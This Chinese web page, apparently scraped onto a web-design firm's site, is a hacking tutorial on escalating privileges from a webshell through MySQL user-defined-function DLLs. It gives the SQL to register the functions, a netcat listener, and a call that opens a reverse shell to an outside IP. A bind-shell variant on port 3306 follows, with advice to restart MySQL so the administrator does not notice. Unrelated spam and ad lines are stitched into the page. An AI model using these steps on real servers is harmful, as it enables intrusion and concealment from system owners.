神武八荒一颗小说,梦入神机,手机推荐排行榜

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案

WEBSHELL提升權(quán)限又一招（Mysql漏洞）

MYSQLl弱口令可以拿到系統(tǒng)權(quán)限，在WEBSHEL上也可實現(xiàn)，不過有個前提，就是目標主機裝有MYSQL，而你又知道MYSQL的用戶和密碼，才能進行提權(quán)。WEBSHELL獲得了，找用戶和密碼也不是什么難事。目前我拿我另外一臺機器做示范，已把PHPSHELL傳上去了，如圖1

創(chuàng)新互聯(lián)是一家專業(yè)提供達拉特企業(yè)網(wǎng)站建設(shè),專注與成都網(wǎng)站設(shè)計、成都網(wǎng)站建設(shè)、H5響應(yīng)式網(wǎng)站、小程序制作等業(yè)務(wù)。10年已為達拉特眾多企業(yè)、政府機構(gòu)等服務(wù)。創(chuàng)新互聯(lián)專業(yè)網(wǎng)站建設(shè)公司優(yōu)惠進行中。

一般來說連接MYSQL的帳戶密碼非常好找，隨便編輯一個PHP文件，就看到了。如圖2

看到了吧，用戶名：root 密碼：123456 庫名：php 然后怎么辦呢？先用SQL Query 建立連接，如圖3

連接成功了，目前開始將我們的提權(quán)用滴東東:Mix.dll My_udf.dll上傳上去先.OK，傳好了，Mix.dll用于反彈連接，My_udf.dll是正向連接，直接用連接對方的3306端口然后輸入密碼就可獲得CMDSHELL。好，不多說了，傳上去之后呢就執(zhí)行以下SQL語句create function Mixconnect returns string soname 'd:＼＼php＼＼php＼＼Mix.dll'; 來注冊函數(shù).

出現(xiàn)SQL語句成功執(zhí)行！如圖4

離拿到CMDSHELL已不遠了，我們先用NC在本地監(jiān)聽一個端口先，Nc -l -p 1234 （這個我想不用截圖了吧）而后執(zhí)行語句：select Mixconnect('192.168.1.254','1234'); 來激活那個函數(shù)，如圖5

執(zhí)行成功，然后看看我們的NC有反映沒，如圖6

成功得到CMSHELL，不過這時對方的MYSQL已假死咯，我們要把MYSQL服務(wù)進程給kill掉，然后重新啟動MYSQL服務(wù)才行，不然管理員發(fā)現(xiàn)網(wǎng)站運行不了了，那就。。。。如果該服務(wù)器不允許連接所有外部IP和端口，而他的3306端口卻是對外開的！這時My_udf.dll就該上場了，使用方法和Mix相同，連接MYSQL成功后執(zhí)行如下語句：create function my_udfdoor returns string soname 'D:＼＼php＼＼php＼my_udf.dll'; 執(zhí)行語句成功后，然后我們就開始激活這個函數(shù)，輸入語句：select my_udfdoor (''); 然后用nc連接3306端口,然后輸入f**k 就能得到一個cmdshell了如圖7

測試結(jié)束

WEBSHELL提升權(quán)限的技巧（Mysql漏洞）大家應(yīng)該掌握了，希望大家多多了解這方面的知識。

【編輯推薦】

詳細解析數(shù)據(jù)加密
內(nèi)部網(wǎng)中的密碼管理
探討ECC加密被破譯的可能性
信息安全的核心之密碼技術(shù) 上
密碼遺忘通關(guān)手冊為你減少不必要的麻煩上

名稱欄目：WEBSHELL提升權(quán)限又一招（Mysql漏洞）
網(wǎng)站路徑：http://www.fisionsoft.com.cn/article/cdeghij.html

新聞中心

其他資訊